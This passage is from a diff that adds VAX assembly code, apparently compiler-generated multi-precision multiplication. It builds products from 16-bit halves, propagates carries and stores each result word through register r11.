+	bicl3	#-65536,4(r7),r3
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,8(r6),-140(fp)
+	bicl3	#-65536,r2,-144(fp)
+	mull3	r0,-140(fp),-132(fp)
+	mull2	r3,-140(fp)
+	mull3	r3,-144(fp),-136(fp)
+	mull2	r0,-144(fp)
+	addl3	-132(fp),-136(fp),r0
+	bicl3	#0,r0,-132(fp)
+	cmpl	-132(fp),-136(fp)
+	bgequ	noname.77
+	addl2	#65536,-144(fp)
+noname.77:
+	movzwl	-130(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-144(fp)
+	bicl3	#-65536,-132(fp),r0
+	ashl	#16,r0,-136(fp)
+	addl3	-136(fp),-140(fp),r0
+	bicl3	#0,r0,-140(fp)
+	cmpl	-140(fp),-136(fp)
+	bgequ	noname.78
+	incl	-144(fp)
+noname.78:
+	movl	-140(fp),r1
+	movl	-144(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.79
+	incl	r2
+noname.79:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.80
+	incl	r10
+noname.80:
+
+	movzwl	14(r6),r2
+	bicl3	#-65536,(r7),r3
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,12(r6),-156(fp)
+	bicl3	#-65536,r2,-160(fp)
+	mull3	r0,-156(fp),-148(fp)
+	mull2	r3,-156(fp)
+	mull3	r3,-160(fp),-152(fp)
+	mull2	r0,-160(fp)
+	addl3	-148(fp),-152(fp),r0
+	bicl3	#0,r0,-148(fp)
+	cmpl	-148(fp),-152(fp)
+	bgequ	noname.81
+	addl2	#65536,-160(fp)
+noname.81:
+	movzwl	-146(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-160(fp)
+	bicl3	#-65536,-148(fp),r0
+	ashl	#16,r0,-152(fp)
+	addl3	-152(fp),-156(fp),r0
+	bicl3	#0,r0,-156(fp)
+	cmpl	-156(fp),-152(fp)
+	bgequ	noname.82
+	incl	-160(fp)
+noname.82:
+	movl	-156(fp),r1
+	movl	-160(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.83
+	incl	r2
+noname.83:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.84
+	incl	r10
+noname.84:
+
+	movl	r9,12(r11)
+
+	clrl	r9
+
+	movzwl	18(r6),r2
+	bicl3	#-65536,(r7),r3
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,16(r6),-172(fp)
+	bicl3	#-65536,r2,-176(fp)
+	mull3	r0,-172(fp),-164(fp)
+	mull2	r3,-172(fp)
+	mull3	r3,-176(fp),-168(fp)
+	mull2	r0,-176(fp)
+	addl3	-164(fp),-168(fp),r0
+	bicl3	#0,r0,-164(fp)
+	cmpl	-164(fp),-168(fp)
+	bgequ	noname.85
+	addl2	#65536,-176(fp)
+noname.85:
+	movzwl	-162(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-176(fp)
+	bicl3	#-65536,-164(fp),r0
+	ashl	#16,r0,-168(fp)
+	addl3	-168(fp),-172(fp),r0
+	bicl3	#0,r0,-172(fp)
+	cmpl	-172(fp),-168(fp)
+	bgequ	noname.86
+	incl	-176(fp)
+noname.86:
+	movl	-172(fp),r1
+	movl	-176(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.87
+	incl	r2
+noname.87:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.88
+	incl	r9
+noname.88:
+
+	movzwl	14(r6),r2
+	bicl3	#-65536,4(r7),r3
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,12(r6),-188(fp)
+	bicl3	#-65536,r2,-192(fp)
+	mull3	r0,-188(fp),-180(fp)
+	mull2	r3,-188(fp)
+	mull3	r3,-192(fp),-184(fp)
+	mull2	r0,-192(fp)
+	addl3	-180(fp),-184(fp),r0
+	bicl3	#0,r0,-180(fp)
+	cmpl	-180(fp),-184(fp)
+	bgequ	noname.89
+	addl2	#65536,-192(fp)
+noname.89:
+	movzwl	-178(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-192(fp)
+	bicl3	#-65536,-180(fp),r0
+	ashl	#16,r0,-184(fp)
+	addl3	-184(fp),-188(fp),r0
+	bicl3	#0,r0,-188(fp)
+	cmpl	-188(fp),-184(fp)
+	bgequ	noname.90
+	incl	-192(fp)
+noname.90:
+	movl	-188(fp),r1
+	movl	-192(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.91
+	incl	r2
+noname.91:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.92
+	incl	r9
+noname.92:
+
+	movzwl	10(r6),r2
+	bicl3	#-65536,8(r7),r3
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,8(r6),-204(fp)
+	bicl3	#-65536,r2,-208(fp)
+	mull3	r0,-204(fp),-196(fp)
+	mull2	r3,-204(fp)
+	mull3	r3,-208(fp),-200(fp)
+	mull2	r0,-208(fp)
+	addl3	-196(fp),-200(fp),r0
+	bicl3	#0,r0,-196(fp)
+	cmpl	-196(fp),-200(fp)
+	bgequ	noname.93
+	addl2	#65536,-208(fp)
+noname.93:
+	movzwl	-194(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-208(fp)
+	bicl3	#-65536,-196(fp),r0
+	ashl	#16,r0,-200(fp)
+	addl3	-200(fp),-204(fp),r0
+	bicl3	#0,r0,-204(fp)
+	cmpl	-204(fp),-200(fp)
+	bgequ	noname.94
+	incl	-208(fp)
+noname.94:
+	movl	-204(fp),r1
+	movl	-208(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.95
+	incl	r2
+noname.95:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.96
+	incl	r9
+noname.96:
+
+	movzwl	6(r6),r2
+	bicl3	#-65536,12(r7),r3
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,4(r6),-220(fp)
+	bicl3	#-65536,r2,-224(fp)
+	mull3	r0,-220(fp),-212(fp)
+	mull2	r3,-220(fp)
+	mull3	r3,-224(fp),-216(fp)
+	mull2	r0,-224(fp)
+	addl3	-212(fp),-216(fp),r0
+	bicl3	#0,r0,-212(fp)
+	cmpl	-212(fp),-216(fp)
+	bgequ	noname.97
+	addl2	#65536,-224(fp)
+noname.97:
+	movzwl	-210(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-224(fp)
+	bicl3	#-65536,-212(fp),r0
+	ashl	#16,r0,-216(fp)
+	addl3	-216(fp),-220(fp),r0
+	bicl3	#0,r0,-220(fp)
+	cmpl	-220(fp),-216(fp)
+	bgequ	noname.98
+	incl	-224(fp)
+noname.98:
+	movl	-220(fp),r1
+	movl	-224(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.99
+	incl	r2
+noname.99:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.100
+	incl	r9
+noname.100:
+
+	movzwl	2(r6),r2
+	bicl3	#-65536,16(r7),r3
+	movzwl	18(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,(r6),-236(fp)
+	bicl3	#-65536,r2,-240(fp)
+	mull3	r0,-236(fp),-228(fp)
+	mull2	r3,-236(fp)
+	mull3	r3,-240(fp),-232(fp)
+	mull2	r0,-240(fp)
+	addl3	-228(fp),-232(fp),r0
+	bicl3	#0,r0,-228(fp)
+	cmpl	-228(fp),-232(fp)
+	bgequ	noname.101
+	addl2	#65536,-240(fp)
+noname.101:
+	movzwl	-226(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-240(fp)
+	bicl3	#-65536,-228(fp),r0
+	ashl	#16,r0,-232(fp)
+	addl3	-232(fp),-236(fp),r0
+	bicl3	#0,r0,-236(fp)
+	cmpl	-236(fp),-232(fp)
+	bgequ	noname.102
+	incl	-240(fp)
+noname.102:
+	movl	-236(fp),r1
+	movl	-240(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.103
+	incl	r2
+noname.103:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.104
+	incl	r9
+noname.104:
+
+	movl	r8,16(r11)
+
+	clrl	r8
+
+	movzwl	2(r6),r2
+	bicl3	#-65536,20(r7),r3
+	movzwl	22(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,(r6),-252(fp)
+	bicl3	#-65536,r2,-256(fp)
+	mull3	r0,-252(fp),-244(fp)
+	mull2	r3,-252(fp)
+	mull3	r3,-256(fp),-248(fp)
+	mull2	r0,-256(fp)
+	addl3	-244(fp),-248(fp),r0
+	bicl3	#0,r0,-244(fp)
+	cmpl	-244(fp),-248(fp)
+	bgequ	noname.105
+	addl2	#65536,-256(fp)
+noname.105:
+	movzwl	-242(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-256(fp)
+	bicl3	#-65536,-244(fp),r0
+	ashl	#16,r0,-248(fp)
+	addl3	-248(fp),-252(fp),r0
+	bicl3	#0,r0,-252(fp)
+	cmpl	-252(fp),-248(fp)
+	bgequ	noname.106
+	incl	-256(fp)
+noname.106:
+	movl	-252(fp),r1
+	movl	-256(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.107
+	incl	r2
+noname.107:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.108
+	incl	r8
+noname.108:
+
+	movzwl	6(r6),r2
+	bicl3	#-65536,16(r7),r3
+	movzwl	18(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,4(r6),-268(fp)
+	bicl3	#-65536,r2,-272(fp)
+	mull3	r0,-268(fp),-260(fp)
+	mull2	r3,-268(fp)
+	mull3	r3,-272(fp),-264(fp)
+	mull2	r0,-272(fp)
+	addl3	-260(fp),-264(fp),r0
+	bicl3	#0,r0,-260(fp)
+	cmpl	-260(fp),-264(fp)
+	bgequ	noname.109
+	addl2	#65536,-272(fp)
+noname.109:
+	movzwl	-258(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-272(fp)
+	bicl3	#-65536,-260(fp),r0
+	ashl	#16,r0,-264(fp)
+	addl3	-264(fp),-268(fp),r0
+	bicl3	#0,r0,-268(fp)
+	cmpl	-268(fp),-264(fp)
+	bgequ	noname.110
+	incl	-272(fp)
+noname.110:
+	movl	-268(fp),r1
+	movl	-272(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.111
+	incl	r2
+noname.111:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.112
+	incl	r8
+noname.112:
+
+	movzwl	10(r6),r2
+	bicl3	#-65536,12(r7),r3
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,8(r6),-284(fp)
+	bicl3	#-65536,r2,-288(fp)
+	mull3	r0,-284(fp),-276(fp)
+	mull2	r3,-284(fp)
+	mull3	r3,-288(fp),-280(fp)
+	mull2	r0,-288(fp)
+	addl3	-276(fp),-280(fp),r0
+	bicl3	#0,r0,-276(fp)
+	cmpl	-276(fp),-280(fp)
+	bgequ	noname.113
+	addl2	#65536,-288(fp)
+noname.113:
+	movzwl	-274(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-288(fp)
+	bicl3	#-65536,-276(fp),r0
+	ashl	#16,r0,-280(fp)
+	addl3	-280(fp),-284(fp),r0
+	bicl3	#0,r0,-284(fp)
+	cmpl	-284(fp),-280(fp)
+	bgequ	noname.114
+	incl	-288(fp)
+noname.114:
+	movl	-284(fp),r1
+	movl	-288(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.115
+	incl	r2
+noname.115:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.116
+	incl	r8
+noname.116:
+
+	movzwl	14(r6),r2
+	bicl3	#-65536,8(r7),r3
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,12(r6),-300(fp)
+	bicl3	#-65536,r2,-304(fp)
+	mull3	r0,-300(fp),-292(fp)
+	mull2	r3,-300(fp)
+	mull3	r3,-304(fp),-296(fp)
+	mull2	r0,-304(fp)
+	addl3	-292(fp),-296(fp),r0
+	bicl3	#0,r0,-292(fp)
+	cmpl	-292(fp),-296(fp)
+	bgequ	noname.117
+	addl2	#65536,-304(fp)
+noname.117:
+	movzwl	-290(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-304(fp)
+	bicl3	#-65536,-292(fp),r0
+	ashl	#16,r0,-296(fp)
+	addl3	-296(fp),-300(fp),r0
+	bicl3	#0,r0,-300(fp)
+	cmpl	-300(fp),-296(fp)
+	bgequ	noname.118
+	incl	-304(fp)
+noname.118:
+	movl	-300(fp),r1
+	movl	-304(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.119
+	incl	r2
+noname.119:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.120
+	incl	r8
+noname.120:
+
+	movzwl	18(r6),r2
+	bicl3	#-65536,4(r7),r3
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,16(r6),-316(fp)
+	bicl3	#-65536,r2,-320(fp)
+	mull3	r0,-316(fp),-308(fp)
+	mull2	r3,-316(fp)
+	mull3	r3,-320(fp),-312(fp)
+	mull2	r0,-320(fp)
+	addl3	-308(fp),-312(fp),r0
+	bicl3	#0,r0,-308(fp)
+	cmpl	-308(fp),-312(fp)
+	bgequ	noname.121
+	addl2	#65536,-320(fp)
+noname.121:
+	movzwl	-306(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-320(fp)
+	bicl3	#-65536,-308(fp),r0
+	ashl	#16,r0,-312(fp)
+	addl3	-312(fp),-316(fp),r0
+	bicl3	#0,r0,-316(fp)
+	cmpl	-316(fp),-312(fp)
+	bgequ	noname.122
+	incl	-320(fp)
+noname.122:
+	movl	-316(fp),r1
+	movl	-320(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.123
+	incl	r2
+
+noname.123:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.124
+	incl	r8
+noname.124:
+
+	movzwl	22(r6),r2
+	bicl3	#-65536,(r7),r3
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,20(r6),-332(fp)
+	bicl3	#-65536,r2,-336(fp)
+	mull3	r0,-332(fp),-324(fp)
+	mull2	r3,-332(fp)
+	mull3	r3,-336(fp),-328(fp)
+	mull2	r0,-336(fp)
+	addl3	-324(fp),-328(fp),r0
+	bicl3	#0,r0,-324(fp)
+	cmpl	-324(fp),-328(fp)
+	bgequ	noname.125
+	addl2	#65536,-336(fp)
+noname.125:
+	movzwl	-322(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-336(fp)
+	bicl3	#-65536,-324(fp),r0
+	ashl	#16,r0,-328(fp)
+	addl3	-328(fp),-332(fp),r0
+	bicl3	#0,r0,-332(fp)
+	cmpl	-332(fp),-328(fp)
+	bgequ	noname.126
+	incl	-336(fp)
+noname.126:
+	movl	-332(fp),r1
+	movl	-336(fp),r2
+	addl2	r1,r10
+	bicl2	#0,r10
+	cmpl	r10,r1
+	bgequ	noname.127
+	incl	r2
+noname.127:
+	addl2	r2,r9
+	bicl2	#0,r9
+	cmpl	r9,r2
+	bgequ	noname.128
+	incl	r8
+noname.128:
+
+	movl	r10,20(r11)
+
+	clrl	r10
+
+	movzwl	26(r6),r2
+	bicl3	#-65536,(r7),r3
+	movzwl	2(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,24(r6),-348(fp)
+	bicl3	#-65536,r2,-352(fp)
+	mull3	r0,-348(fp),-340(fp)
+	mull2	r3,-348(fp)
+	mull3	r3,-352(fp),-344(fp)
+	mull2	r0,-352(fp)
+	addl3	-340(fp),-344(fp),r0
+	bicl3	#0,r0,-340(fp)
+	cmpl	-340(fp),-344(fp)
+	bgequ	noname.129
+	addl2	#65536,-352(fp)
+noname.129:
+	movzwl	-338(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-352(fp)
+	bicl3	#-65536,-340(fp),r0
+	ashl	#16,r0,-344(fp)
+	addl3	-344(fp),-348(fp),r0
+	bicl3	#0,r0,-348(fp)
+	cmpl	-348(fp),-344(fp)
+	bgequ	noname.130
+	incl	-352(fp)
+noname.130:
+	movl	-348(fp),r1
+	movl	-352(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.131
+	incl	r2
+noname.131:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.132
+	incl	r10
+noname.132:
+
+	movzwl	22(r6),r2
+	bicl3	#-65536,4(r7),r3
+	movzwl	6(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,20(r6),-364(fp)
+	bicl3	#-65536,r2,-368(fp)
+	mull3	r0,-364(fp),-356(fp)
+	mull2	r3,-364(fp)
+	mull3	r3,-368(fp),-360(fp)
+	mull2	r0,-368(fp)
+	addl3	-356(fp),-360(fp),r0
+	bicl3	#0,r0,-356(fp)
+	cmpl	-356(fp),-360(fp)
+	bgequ	noname.133
+	addl2	#65536,-368(fp)
+noname.133:
+	movzwl	-354(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-368(fp)
+	bicl3	#-65536,-356(fp),r0
+	ashl	#16,r0,-360(fp)
+	addl3	-360(fp),-364(fp),r0
+	bicl3	#0,r0,-364(fp)
+	cmpl	-364(fp),-360(fp)
+	bgequ	noname.134
+	incl	-368(fp)
+noname.134:
+	movl	-364(fp),r1
+	movl	-368(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.135
+	incl	r2
+noname.135:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.136
+	incl	r10
+noname.136:
+
+	movzwl	18(r6),r2
+	bicl3	#-65536,8(r7),r3
+	movzwl	10(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,16(r6),-380(fp)
+	bicl3	#-65536,r2,-384(fp)
+	mull3	r0,-380(fp),-372(fp)
+	mull2	r3,-380(fp)
+	mull3	r3,-384(fp),-376(fp)
+	mull2	r0,-384(fp)
+	addl3	-372(fp),-376(fp),r0
+	bicl3	#0,r0,-372(fp)
+	cmpl	-372(fp),-376(fp)
+	bgequ	noname.137
+	addl2	#65536,-384(fp)
+noname.137:
+	movzwl	-370(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-384(fp)
+	bicl3	#-65536,-372(fp),r0
+	ashl	#16,r0,-376(fp)
+	addl3	-376(fp),-380(fp),r0
+	bicl3	#0,r0,-380(fp)
+	cmpl	-380(fp),-376(fp)
+	bgequ	noname.138
+	incl	-384(fp)
+noname.138:
+	movl	-380(fp),r1
+	movl	-384(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.139
+	incl	r2
+noname.139:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.140
+	incl	r10
+noname.140:
+
+	movzwl	14(r6),r2
+	bicl3	#-65536,12(r7),r3
+	movzwl	14(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,12(r6),-396(fp)
+	bicl3	#-65536,r2,-400(fp)
+	mull3	r0,-396(fp),-388(fp)
+	mull2	r3,-396(fp)
+	mull3	r3,-400(fp),-392(fp)
+	mull2	r0,-400(fp)
+	addl3	-388(fp),-392(fp),r0
+	bicl3	#0,r0,-388(fp)
+	cmpl	-388(fp),-392(fp)
+	bgequ	noname.141
+	addl2	#65536,-400(fp)
+noname.141:
+	movzwl	-386(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-400(fp)
+	bicl3	#-65536,-388(fp),r0
+	ashl	#16,r0,-392(fp)
+	addl3	-392(fp),-396(fp),r0
+	bicl3	#0,r0,-396(fp)
+	cmpl	-396(fp),-392(fp)
+	bgequ	noname.142
+	incl	-400(fp)
+noname.142:
+	movl	-396(fp),r1
+	movl	-400(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.143
+	incl	r2
+noname.143:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.144
+	incl	r10
+noname.144:
+
+	movzwl	10(r6),r2
+	bicl3	#-65536,16(r7),r3
+	movzwl	18(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,8(r6),-412(fp)
+	bicl3	#-65536,r2,-416(fp)
+	mull3	r0,-412(fp),-404(fp)
+	mull2	r3,-412(fp)
+	mull3	r3,-416(fp),-408(fp)
+	mull2	r0,-416(fp)
+	addl3	-404(fp),-408(fp),r0
+	bicl3	#0,r0,-404(fp)
+	cmpl	-404(fp),-408(fp)
+	bgequ	noname.145
+	addl2	#65536,-416(fp)
+noname.145:
+	movzwl	-402(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-416(fp)
+	bicl3	#-65536,-404(fp),r0
+	ashl	#16,r0,-408(fp)
+	addl3	-408(fp),-412(fp),r0
+	bicl3	#0,r0,-412(fp)
+	cmpl	-412(fp),-408(fp)
+	bgequ	noname.146
+	incl	-416(fp)
+noname.146:
+	movl	-412(fp),r1
+	movl	-416(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.147
+	incl	r2
+noname.147:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.148
+	incl	r10
+noname.148:
+
+	movzwl	6(r6),r2
+	bicl3	#-65536,20(r7),r3
+	movzwl	22(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,4(r6),-428(fp)
+	bicl3	#-65536,r2,-432(fp)
+	mull3	r0,-428(fp),-420(fp)
+	mull2	r3,-428(fp)
+	mull3	r3,-432(fp),-424(fp)
+	mull2	r0,-432(fp)
+	addl3	-420(fp),-424(fp),r0
+	bicl3	#0,r0,-420(fp)
+	cmpl	-420(fp),-424(fp)
+	bgequ	noname.149
+	addl2	#65536,-432(fp)
+noname.149:
+	movzwl	-418(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-432(fp)
+	bicl3	#-65536,-420(fp),r0
+	ashl	#16,r0,-424(fp)
+	addl3	-424(fp),-428(fp),r0
+	bicl3	#0,r0,-428(fp)
+	cmpl	-428(fp),-424(fp)
+	bgequ	noname.150
+	incl	-432(fp)
+noname.150:
+	movl	-428(fp),r1
+	movl	-432(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.151
+	incl	r2
+noname.151:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.152
+	incl	r10
+noname.152:
+
+	movzwl	2(r6),r2
+	bicl3	#-65536,24(r7),r3
+	movzwl	26(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,(r6),-444(fp)
+	bicl3	#-65536,r2,-448(fp)
+	mull3	r0,-444(fp),-436(fp)
+	mull2	r3,-444(fp)
+	mull3	r3,-448(fp),-440(fp)
+	mull2	r0,-448(fp)
+	addl3	-436(fp),-440(fp),r0
+	bicl3	#0,r0,-436(fp)
+	cmpl	-436(fp),-440(fp)
+	bgequ	noname.153
+	addl2	#65536,-448(fp)
+noname.153:
+	movzwl	-434(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-448(fp)
+	bicl3	#-65536,-436(fp),r0
+	ashl	#16,r0,-440(fp)
+	addl3	-440(fp),-444(fp),r0
+	bicl3	#0,r0,-444(fp)
+	cmpl	-444(fp),-440(fp)
+	bgequ	noname.154
+	incl	-448(fp)
+noname.154:
+	movl	-444(fp),r1
+	movl	-448(fp),r2
+	addl2	r1,r9
+	bicl2	#0,r9
+	cmpl	r9,r1
+	bgequ	noname.155
+	incl	r2
+noname.155:
+	addl2	r2,r8
+	bicl2	#0,r8
+	cmpl	r8,r2
+	bgequ	noname.156
+	incl	r10
+noname.156:
+
+	movl	r9,24(r11)
+
+	clrl	r9
+
+	movzwl	2(r6),r2
+	bicl3	#-65536,28(r7),r3
+	movzwl	30(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,(r6),-460(fp)
+	bicl3	#-65536,r2,-464(fp)
+	mull3	r0,-460(fp),-452(fp)
+	mull2	r3,-460(fp)
+	mull3	r3,-464(fp),-456(fp)
+	mull2	r0,-464(fp)
+	addl3	-452(fp),-456(fp),r0
+	bicl3	#0,r0,-452(fp)
+	cmpl	-452(fp),-456(fp)
+	bgequ	noname.157
+	addl2	#65536,-464(fp)
+noname.157:
+	movzwl	-450(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-464(fp)
+	bicl3	#-65536,-452(fp),r0
+	ashl	#16,r0,-456(fp)
+	addl3	-456(fp),-460(fp),r0
+	bicl3	#0,r0,-460(fp)
+	cmpl	-460(fp),-456(fp)
+	bgequ	noname.158
+	incl	-464(fp)
+noname.158:
+	movl	-460(fp),r1
+	movl	-464(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.159
+	incl	r2
+noname.159:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.160
+	incl	r9
+noname.160:
+
+	movzwl	6(r6),r2
+	bicl3	#-65536,24(r7),r3
+	movzwl	26(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,4(r6),-476(fp)
+	bicl3	#-65536,r2,-480(fp)
+	mull3	r0,-476(fp),-468(fp)
+	mull2	r3,-476(fp)
+	mull3	r3,-480(fp),-472(fp)
+	mull2	r0,-480(fp)
+	addl3	-468(fp),-472(fp),r0
+	bicl3	#0,r0,-468(fp)
+	cmpl	-468(fp),-472(fp)
+	bgequ	noname.161
+	addl2	#65536,-480(fp)
+noname.161:
+	movzwl	-466(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-480(fp)
+	bicl3	#-65536,-468(fp),r0
+	ashl	#16,r0,-472(fp)
+	addl3	-472(fp),-476(fp),r0
+	bicl3	#0,r0,-476(fp)
+	cmpl	-476(fp),-472(fp)
+	bgequ	noname.162
+	incl	-480(fp)
+noname.162:
+	movl	-476(fp),r1
+	movl	-480(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.163
+	incl	r2
+noname.163:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.164
+	incl	r9
+noname.164:
+
+	movzwl	10(r6),r2
+	bicl3	#-65536,20(r7),r3
+	movzwl	22(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,8(r6),-492(fp)
+	bicl3	#-65536,r2,-496(fp)
+	mull3	r0,-492(fp),-484(fp)
+	mull2	r3,-492(fp)
+	mull3	r3,-496(fp),-488(fp)
+	mull2	r0,-496(fp)
+	addl3	-484(fp),-488(fp),r0
+	bicl3	#0,r0,-484(fp)
+	cmpl	-484(fp),-488(fp)
+	bgequ	noname.165
+	addl2	#65536,-496(fp)
+noname.165:
+	movzwl	-482(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-496(fp)
+	bicl3	#-65536,-484(fp),r0
+	ashl	#16,r0,-488(fp)
+	addl3	-488(fp),-492(fp),r0
+	bicl3	#0,r0,-492(fp)
+	cmpl	-492(fp),-488(fp)
+	bgequ	noname.166
+	incl	-496(fp)
+noname.166:
+	movl	-492(fp),r1
+	movl	-496(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.167
+	incl	r2
+noname.167:
+	addl2	r2,r10
+	bicl2	#0,r10
+	cmpl	r10,r2
+	bgequ	noname.168
+	incl	r9
+noname.168:
+
+	movzwl	14(r6),r2
+	bicl3	#-65536,16(r7),r3
+	movzwl	18(r7),r0
+	bicl2	#-65536,r0
+	bicl3	#-65536,12(r6),-508(fp)
+	bicl3	#-65536,r2,-512(fp)
+	mull3	r0,-508(fp),-500(fp)
+	mull2	r3,-508(fp)
+	mull3	r3,-512(fp),-504(fp)
+	mull2	r0,-512(fp)
+	addl3	-500(fp),-504(fp),r0
+	bicl3	#0,r0,-500(fp)
+	cmpl	-500(fp),-504(fp)
+	bgequ	noname.169
+	addl2	#65536,-512(fp)
+noname.169:
+	movzwl	-498(fp),r0
+	bicl2	#-65536,r0
+	addl2	r0,-512(fp)
+	bicl3	#-65536,-500(fp),r0
+	ashl	#16,r0,-504(fp)
+	addl3	-504(fp),-508(fp),r0
+	bicl3	#0,r0,-508(fp)
+	cmpl	-508(fp),-504(fp)
+	bgequ	noname.170
+	incl	-512(fp)
+noname.170:
+	movl	-508(fp),r1
+	movl	-512(fp),r2
+	addl2	r1,r8
+	bicl2	#0,r8
+	cmpl	r8,r1
+	bgequ	noname.171
+	incl	r2
+noname.171:
+	addl2	r2,r10
+	bicl2	#0,r10
